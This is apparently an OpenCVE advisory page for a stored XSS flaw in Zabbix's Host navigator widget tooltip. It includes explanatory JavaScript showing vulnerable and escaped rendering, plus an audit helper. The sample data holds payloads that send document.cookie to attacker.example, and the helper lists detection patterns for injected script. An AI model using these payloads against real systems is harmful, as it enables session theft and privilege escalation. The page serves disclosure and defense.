Description
An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user who opens the tooltip for that maintenance period in the Host navigator widget. This can allow the attacker to perform unauthorized actions depending on which user opens the tooltip.
Published: 2026-05-06
Score: 7.3 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An authenticated administrator without super-admin rights can save a maintenance period whose text contains a script payload. The payload is stored server-side and runs in the browser of any user who later opens the tooltip for that maintenance period in the Host navigator widget, which makes this a stored cross-site scripting flaw (CWE-79). The script executes with the viewing user's session and Zabbix privileges, so the attacker can issue frontend or API requests as that user, read whatever the victim can read and change whatever the victim can change. If a super administrator opens the tooltip, the attacker effectively gains super-admin control of the Zabbix installation; that is the escalation the CVSS vector reflects with high confidentiality, integrity and availability impact (VC:H/VI:H/VA:H).
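The rendering defect behind CWE-79 here, shown as an added illustration written for this page and not as Zabbix's Host navigator widget code (which the page does not reproduce): a constructed maintenance object carrying a payload in its name is passed through a renderer that interpolates the field straight into tooltip markup, then through one that escapes it first. The object shape, the function names, the choice of the name field and the payload itself are assumptions made for the example.

```javascript
// Added illustration of the stored-XSS pattern described above. This is NOT
// Zabbix's widget code; the object shape, function names and payload are assumptions.

// Constructed maintenance period as a non-super administrator could save it
// (the page does not say which field the real payload lives in; "name" is assumed).
const MAINTENANCE_SAMPLE = {
  maintenanceid: "7",
  name: 'Patch window <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  description: "Monthly patching",
};

// Vulnerable pattern: the stored text is interpolated straight into tooltip
// markup, so when the tooltip is shown the browser parses the attacker's tag
// and fires its onerror handler in the viewing user's session.
function renderTooltipVulnerable(m) {
  return `<div class="tooltip"><b>${m.name}</b><p>${m.description}</p></div>`;
}

// Escapes the five characters that can break out of HTML text or a
// double-quoted attribute value. Sufficient for those two contexts only.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: every untrusted field is escaped at the point it enters HTML,
// so the payload is displayed as literal text instead of being parsed.
function renderTooltipSafe(m) {
  return `<div class="tooltip"><b>${escapeHtml(m.name)}</b><p>${escapeHtml(m.description)}</p></div>`;
}

// Counts tags in the output that the template itself did not emit. The template
// contributes exactly six tags (div, b, /b, p, /p, /div); anything beyond that
// came from stored data and would be parsed by the victim's browser.
function injectedTagCount(html) {
  return (html.match(/<\/?[a-z]/gi) || []).length - 6;
}

console.log(renderTooltipVulnerable(MAINTENANCE_SAMPLE));
console.log(renderTooltipSafe(MAINTENANCE_SAMPLE));
console.log("injected tags:", injectedTagCount(renderTooltipVulnerable(MAINTENANCE_SAMPLE)),
            "vs", injectedTagCount(renderTooltipSafe(MAINTENANCE_SAMPLE)));
```

In a real widget the safe path is to build the tooltip with DOM APIs (textContent, createElement) or a templating layer that escapes by default; the hand-written escapeHtml above only shows which characters matter for the HTML text and double-quoted attribute contexts and is not a substitute for a reviewed library. Escaping is context-specific: a value placed into a URL, a JavaScript string or a CSS value needs a different encoder.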

Affected Systems

Zabbix installations that ship the Host navigator dashboard widget are affected. The CVE record shown on this page lists no affected or fixed versions, so treat every installation that exposes this widget as potentially impacted and check it against the vendor's advisory and the current patch level.

Risk and Exploitability

With a CVSS 4.0 base score of 7.3 the severity is high. The vector (AV:N/AC:L/AT:P/PR:H/UI:P) explains why it is not higher: the attacker already needs administrator privileges (PR:H), and exploitation requires a second user to open the tooltip (AT:P, UI:P), so this is a two-step, victim-dependent attack rather than a remote unauthenticated one. The payoff scales with the victim, since the attacker gains whatever the viewing user can do, and a super administrator is the obvious target. No EPSS score is available and the vulnerability is not in the CISA KEV catalog, which records no confirmed in-the-wild exploitation, not that exploitation is difficult: a maintenance period is a routine object an administrator creates through the normal UI. Apply the vendor fix, or disable the widget until the fix is applied.

Generated by OpenCVE AI on May 6, 2026 at 08:21 UTC.

Remediation

Vendor Solution

Update the affected components to their respective fixed versions.


Vendor Workaround

Disable the Host navigator widget via Administration -> General -> Modules.


OpenCVE Recommended Actions

  • Apply the vendor‑supplied patch to the Zabbix Host navigator widget component.
  • Disable the Host navigator widget via Administration → General → Modules if a patch cannot be applied immediately.
  • Review existing maintenance periods for HTML or script content (name, description and tag values are all administrator-editable text) and restrict who can create or edit them until the patch is applied; treat any entry created by a non-super administrator that contains markup as hostile.
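An added audit helper for the last action, written for this page and not part of Zabbix or OpenCVE: it builds the maintenance.get JSON-RPC request (a real Zabbix API method; the output fields and the selectTags parameter are real) and scans the returned objects for markup or script-like content. The page does not say which field carries the payload, so the scan covers name, description and tag values. Actually sending the request, the endpoint path /api_jsonrpc.php and Bearer-token authentication are assumptions noted in the comments; the sample result below is constructed, not captured from a server.

```javascript
// Added audit helper for reviewing maintenance periods. Not Zabbix code.
// Assumptions: the API lives at <frontend>/api_jsonrpc.php and an API token is
// sent as "Authorization: Bearer <token>" (older releases pass "auth" in the body).

// JSON-RPC body for maintenance.get. The method, output fields and selectTags
// are real Zabbix API parameters; transport is left to the caller so this runs offline.
function buildMaintenanceGetRequest(id = 1) {
  return {
    jsonrpc: "2.0",
    method: "maintenance.get",
    params: { output: ["maintenanceid", "name", "description"], selectTags: "extend" },
    id,
  };
}

// Heuristic patterns that have no legitimate place in maintenance text.
// Expect occasional false positives (e.g. a word starting with "on" followed by "=");
// every hit should be reviewed by a person, not deleted automatically.
const SUSPICIOUS = [
  { label: "html-tag", re: /<\s*\/?[a-z][^>]*>/i },
  { label: "event-handler", re: /\bon[a-z]+\s*=/i },
  { label: "javascript-uri", re: /javascript\s*:/i },
  { label: "script-keyword", re: /\b(?:document|window|eval|fetch)\b\s*[.(]/ },
];

// Returns the labels of every pattern that matches one text field.
function scanField(value) {
  return SUSPICIOUS.filter(({ re }) => re.test(String(value ?? ""))).map(({ label }) => label);
}

// Walks a maintenance.get result and returns one finding per suspicious field.
function auditMaintenances(result) {
  const findings = [];
  for (const m of result) {
    const fields = { name: m.name, description: m.description };
    (m.tags ?? []).forEach((t, i) => {
      fields[`tag[${i}].tag`] = t.tag;
      fields[`tag[${i}].value`] = t.value;
    });
    for (const [field, value] of Object.entries(fields)) {
      const labels = scanField(value);
      if (labels.length) findings.push({ maintenanceid: m.maintenanceid, field, labels });
    }
  }
  return findings;
}

// Constructed sample of what maintenance.get could return (assumed shape, not real data).
const SAMPLE_RESULT = [
  { maintenanceid: "1", name: "Weekly backup window", description: "Sat 02:00-04:00", tags: [] },
  { maintenanceid: "2", name: 'DB upgrade <svg onload=fetch("//attacker.example/"+document.cookie)>', description: "", tags: [] },
  { maintenanceid: "3", name: "Cluster reboot", description: "see ticket",
    tags: [{ tag: "owner", value: '<a href="javascript:alert(1)">x</a>' }] },
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(buildMaintenanceGetRequest()));
  console.log(auditMaintenances(SAMPLE_RESULT));
}
```

To run it against a live server, POST the request body with Content-Type application/json-rpc and the Bearer header (assumed above), then pass the response's result array to auditMaintenances. Each finding carries the maintenanceid so the entry can be pulled up in the UI, and the audit log will show which administrator created it.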

Generated by OpenCVE AI on May 6, 2026 at 08:21 UTC.

Tracking


Advisories

No advisories yet.

History

Wed, 06 May 2026 09:15:00 +0000

Type                | Values Removed | Values Added
First Time appeared |                | Zabbix; Zabbix zabbix
Vendors & Products  |                | Zabbix; Zabbix zabbix

Wed, 06 May 2026 07:30:00 +0000

Type        | Values Removed | Values Added
Description |                | An authenticated (non-super) administrator can create a maintenance period with a JavaScript payload that is executed by any user that opens tooltip for that maintenance period in the Host navigator widget. This can allow the attacker to perform unauthorized actions depending on which user opens the tooltip.
Title       |                | Stored XSS vulnerability in Host navigator widget maintenance tooltip
Weaknesses  |                | CWE-79
References  |                |
Metrics     |                | cvssV4_0 {'score': 7.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N'}



MITRE

Status: PUBLISHED

Assigner: Zabbix

Published:

Updated: 2026-05-06T06:58:51.362Z

Reserved: 2026-01-19T14:02:54.327Z

Link: CVE-2026-23926

Vulnrichment

No data.

NVD

Status: Received

Published: 2026-05-06T08:16:01.837

Modified: 2026-05-06T08:16:01.837

Link: CVE-2026-23926

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-06T09:00:09Z

Weaknesses